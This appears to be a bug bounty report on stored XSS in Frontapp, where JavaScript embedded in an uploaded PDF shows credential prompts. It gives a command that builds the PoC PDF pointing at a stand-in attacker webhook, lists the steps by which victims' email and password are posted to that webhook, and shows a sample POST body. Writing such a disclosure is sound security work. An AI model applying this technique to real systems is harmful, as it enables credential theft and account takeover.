Title:
Stored XSS via Malicious PDF Uploads Allows Attacker to execute Arbitrary JS, Leading to Credential Theft & Account Takeover
Summary:
Frontapp does not sanitize JavaScript or interactive form actions in uploaded PDF files. When a user opens a PDF attachment in-browser, arbitrary JavaScript embedded in the PDF executes.
This allows an attacker to harvest user credentials via native browser input dialogs and exfiltrate them to an external, attacker-controlled endpoint using the PDF's built-in form submission mechanism, resulting in full account takeover.
Testing Requirements
- python script (i have attached for reference)
- webhook url
- Chrome browser
Steps To Reproduce:
Attacker (Setup)
Run the PoC script to generate the malicious PDF
python3 xss_poc.py "<https://attacker-webhook.example>" pdf-xss-poc.pdf
Log in to your account
Upload xss-poc.pdf as an attachment in Notes section
share the Note with other user or share it Publicly
Victim (Trigger)
Victim receives the message containing the PDF attachment
Victim clicks the attachment
The PDF renders in-browser → JavaScript auto-executes immediately
Victim enters their email/username → clicks OK
A second dialog appears: "Password:" → victim enters password → clicks OK
Victim clicks anywhere on the PDF page (e.g., the "View document" button) - This tigger the submit request
Attacker (Exfiltration)
The hidden full-page SubmitForm button fires → credentials are POST-ed to the attacker's webhook
Attacker receives the victim's email + password on their webhook endpoint
Expected Result
The attacker's webhook receives a POST request containing:Code55 Bytes
email=victim@company.com&password=their_actual_password
Full credential compromise is achieved without the victim suspecting anything
Impact:
Credential Theft Attacker obtains plaintext username and password
Account Takeover Stolen credentials allow full account access, including workspace data, billing, and admin functions
Can affect all users who have a public link